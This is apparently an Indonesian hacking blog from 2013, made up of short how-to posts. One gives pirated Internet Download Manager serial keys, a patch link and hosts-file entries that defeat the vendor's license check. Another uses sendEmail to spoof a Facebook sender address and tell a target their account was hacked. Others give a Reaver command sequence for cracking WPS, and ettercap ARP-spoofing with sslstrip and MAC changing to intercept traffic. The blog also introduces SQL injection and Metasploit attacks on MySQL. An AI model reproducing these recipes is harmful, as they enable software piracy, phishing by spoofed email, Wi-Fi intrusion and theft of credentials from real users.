IDM Full tanpa crack

Posted in Beragam on Juli 30, 2013 by spand3x

Cara ini bisa digunakan untuk IDM versi berapa aja :)
Install… kalo ada peringatan fake serial atau disuruh register abaikan dulu / klik cancel.

Lalu perhatikan cara berikut :

1. Hal pertama yg harus kita lakukan adalah mematikan / memutuskan koneksi internet komputer kita.

2. Setelah itu isi registration. First name, last name, dan email terserah kita. Untuk serial number gunakan (pilih salah satu) :
- W3J5U-8U66N-D0B9M-54SLM
- EC0Q6-QN7UH-5S3JB-YZMEK
- GZLJY-X50S3-0S20D-NFRF9
atau download ini webnya http://www.4shared.com/get/UiA7NdQR/Patch_IDM_607.html
Buka windows explorer, cari file bernama hosts di C:\WINDOWS\system32\drivers\etc\hosts
Buka file hosts tersebut dengan notepad.

4. Lalu copas code berikut :
127.0.0.1 tonec.com
127.0.0.1 http://www.tonec.com
127.0.0.1 registeridm.com
127.0.0.1 http://www.registeridm.com
127.0.0.1 secure.registeridm.com
127.0.0.1 secure.internetdownloadmanager.com
127.0.0.1 mirror.internetdownloadmanager.com
127.0.0.1 mirror2.internetdownloadmanager.com

Letakkan dibawah tulisan 127.0.0.1 localhost yang berada di dalam notpad yang kita buka tadi
Setelah itu save (Ctrl S).

5. Nyalakan kembali koneksi internet.

Beress… IDM kita sudah full version… tanpa harus menggunakan crack (^_^)

(edit) masih bisa untuk IDM versi terbaru 6.07 Build 15 :
Tambahan :

1. Kalo file hosts nggak ketemu, ada kemungkinan terhidden. Aktifkan view hidden files di windows explorer.

2. Untuk pengguna windows vista / windows 7, cara edit file hosts nya :
- Copy file hosts ke drive lain selain drive C
- Edit dengan notepad kemudian save
- Copy paste file tersebut ke tempat asal folder file hosts

3. Karena kita telah mem-block main download server IDM (mirror2.internetdownloadmanager.com), maka untuk mendownload versi terbaru dari IDM, pilih download from Cnet, atau dari Mirror Site yg ada di Page Download.

Problem with SVN Up Msfupdate in BT5 r3

Posted in Backtrack on Juli 30, 2013 by spand3x

This is how to fix

apt-add-repository ppa:svn/ppa

apt-get update

apt-get dist-upgrade

 

 

kirim Email dari Terminal di Backtrack

Posted in Backtrack on Juli 15, 2013 by spand3x

Tanpa prat pret prot, ba bi bu…..langsung aj ya bray….
 
1. Buka terminal, dan masukkan perintah
 
 apt-get install sendEmail
 
Untuk pengguna ubuntu, tambahkan sudo pada awal perintah untuk mengankat privilege user menjadi superuser a.k.a root.
 
 sudo apt-get install sendEmail
 
2. Setelah terinstall gunakan sendEmail untuk mengirim email. Format dalam menulis email dalam terminal adalah
 
 sendEmail -f <inisial”emailkamu@email.com>” -t tujuan@email.com -u “subyek email” -m “isi pesan” -s server email:port -xu username email kamu -xp password email kamu
 
Contoh:
 
Email saya: attacker@gmail.com
Tujuan saya: target@yahoo.com
Server email google: smtp.gmail.com
Port smtp: 587
inisial saya: admin@facebook.com
Subyek: Alert
Isi pesan:  account anda sudah di hack
 
sendEmail -f admin@facebook.com -t target@yahoo.com -u Alert -m account and sudah di hack -s smtp.gmail.com:587 -xu attacker@gmail.com -xp (password email)
 

SQL Injection

Posted in Backtrack on Juli 11, 2013 by spand3x

Hai Kawan2, berikut sedkit mengenai SQL Injection, bila ada yg belum jelas mengenai apa itu SQl Injection saya akan informasikan sedikit, SQL Injection adalah salah satu teknik yang sering di gunakan untuk menyerang sebuah situs web. dengan cara ini memungkinkan seseorang dapat login tanpa harus memiliki akun di sebuah web site Selain itu SQL injection juga memungkinkan seseorang merubah, menghapus, maupun menambahkan data–data yang berada didalam database bahkan pula dapat mematikannya. Baca lebih lanjut

Hack WPS dengan Reaver di Backtrack 5 R3

Posted in Backtrack on Juli 10, 2013 by spand3x

Langsung aja

 

Sudo apt-get update

Sudo apt-get install reaver

Airmon-ng start wlan0

Reaver –I mon0 –b <BSSID dari target> -VV

72

Semoga bermanfaat

 

*Knowledge is Power

Attacking MySQL With Metasploit

Posted in Backtrack on Juli 8, 2013 by spand3x

spand3x:

nice way to inject :)

Originally posted on Penetration Testing Lab:

MySQL is one of the most used databases that is being used by many applications in nowadays.So in a penetration testing engagement it is almost impossible not to find a system that will run a MySQL server.In this article we will see how we can attack a MySQL database with the help of Metasploit framework.

Lets say that is in the scope of our penetration test is a MySQL server.The first step is to discover the version of the database.Metasploit Framework has a module that allows us to find the version of the database.Knowing the version of the database will help us to discover additional vulnerabilities.

Metasploit Module for MySQL version enumeration

 

The only thing that we have to do is to insert the remote IP address and to execute it with the run command.

Discovering the version of MySQL

 

Now we can use the mysql_login module in…

View original 635 more words

SSL Strip and Ettercap

Posted in Backtrack on Juli 6, 2013 by spand3x

Langsung aja ya friends….

Ini memang topik yg udah basi tp saya tetap share siapa tau ada yg belom tau…this is it:

ifconfig wlan0 down

b.  macchanger –mac 00:22:33:44:55:66

c.  ifconfig wlan0 up

1. echo 1 > /proc/sys/net/ipv4/ip_forward

2. ettercap -T -q -i wlan0 -M arp:remote // //

3. iptables -t nat -A PREROUTING -i wlan0 -p tcp –destination-port 80 -j          REDIRECT –to-port 10000

4.  sslstrip -a -k -l 10000
6808657691_fe7df32b29_b

Yah semoga bermanfaat buat kalian…

 

*Knowledge is Power

 

 

Ikuti

Get every new post delivered to your Inbox.